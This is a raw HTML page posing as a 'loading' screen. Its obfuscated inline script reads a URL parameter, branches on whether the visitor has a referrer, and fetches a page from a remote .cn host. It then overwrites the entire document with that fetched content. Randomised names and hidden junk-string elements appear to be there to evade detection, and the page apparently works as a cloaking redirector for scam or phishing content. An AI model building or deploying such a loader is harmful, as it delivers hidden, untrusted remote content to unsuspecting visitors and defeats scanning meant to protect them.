<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UzpH52 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UzpH52 .N8jbx9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UzpH52 .content {
            line-height: 50px;
            text-align: center
        }

        .UzpH52 .img {
            width: 100%
        }

        .UzpH52 .vfL30X6wIlB {
            text-align: center
        }

        .UzpH52 .vfL30X6wIlB span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UzpH52 .vfL30X6wIlB span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UzpH52 .vfL30X6wIlB span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UzpH52 .vfL30X6wIlB span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UzpH52 .vfL30X6wIlB span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UzpH52 .vfL30X6wIlB span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UzpH52 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Bshqx46jKHx(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RwZU6mw = Bshqx46jKHx('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RwZU6mw +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RwZU6mw +".html?a=share";
		}
		
        XEii3eP3=url+"#"+new Date().getTime();
        XEii3eP3 && function() {
            $.get(XEii3eP3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>m5Y2XiY4kC7VsRaua</div>
<b style='display:none' >t7o0gVYJhfoCdUPer</b>
<ul style='display:none' >UlOq7BUjGqVeWDEFMR9VxGevq6QWEmo6pee66kB45e</ul>
<li style='display:none' >VPP27g1JAIlj9qM9</li><div class="UzpH52">
    <div class="N8jbx9">
        <div class="vfL30X6wIlB">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >kNljZY63c2pU79StW1EX23zvSG5tpYKHr3gpDYoEbVTW2VYZ5HBd2RURilmkT3d8tRZxxdnP</h1>
<b style='display:none' >qMnXCb8llud3thZ</b>
<span style='display:none'>weFHmFBCBu4cHdphIknxmLleAjua6xAIIjf4bM94fyRqeqTXsN5GTBqb</span>
<p  style='display:none'>oD52PJxKtWqprnoZ8CR6KTzKEec5cTnqaTK8NbFyCFxkdsm0qQQsIqgjWWaZMFGaX</p>
<h1 style='display:none' >kNljZY63c2pU79StW1EX23zvSG5tpYKHr3gpDYoEbVTW2VYZ5HBd2RURilmkT3d8tRZxxdnP</h1>
<img  src='' style='display:none'>
<li style='display:none' >S7I7DWpX9J5cAQqLhIPvZkQKvANi2reP</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>